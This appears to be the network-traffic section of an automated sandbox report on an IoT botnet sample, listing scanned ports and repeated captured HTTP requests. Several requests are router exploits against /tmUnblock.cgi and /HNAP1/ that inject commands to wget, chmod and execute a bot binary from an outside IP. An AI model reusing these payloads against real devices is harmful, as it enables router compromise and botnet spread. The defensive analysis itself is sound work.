Source: unknown | Network traffic detected: HTTP traffic on port 39708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 60680 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 40232 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56272 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37364 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 34544 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 41662 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 53182 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 55970 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 50986 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 34682 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 54996 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 59552 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 48424 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 32882 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36068 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 53084 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 32882 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36068 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 52470 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 44254 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 39996 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 55940 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 35332 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37610 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 40764 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58654 |
Source: unknown | Network traffic detected: HTTP traffic on port 32882 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 36068 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 57398 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52048 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58668 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58714 |
Source: unknown | Network traffic detected: HTTP traffic on port 35604 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38236 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 39204 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 56356 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36568 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37112 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58730 |
Source: unknown | Network traffic detected: HTTP traffic on port 51252 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37852 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58840 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58864 |
Source: unknown | Network traffic detected: HTTP traffic on port 38708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58882 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58908 |
Source: unknown | Network traffic detected: HTTP traffic on port 38708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37086 -> 5555 |
Source: unknown | Network traffic detected: HTTP traffic on port 37132 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 58932 |
Source: unknown | Network traffic detected: HTTP traffic on port 23 -> 59030 |
Source: unknown | Network traffic detected: HTTP traffic on port 38708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 50082 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 56204 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 50426 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 56308 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 37132 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 40084 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 38708 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 35332 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 45504 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 52616 -> 8081 |
Source: unknown | Network traffic detected: HTTP traffic on port 54768 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 54296 -> 37215 |
Source: unknown | Network traffic detected: HTTP traffic on port 37132 -> 52869 |
Source: unknown | Network traffic detected: HTTP traffic on port 45992 -> 1723 |
Source: unknown | Network traffic detected: HTTP traffic on port 36930 -> 1723 |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
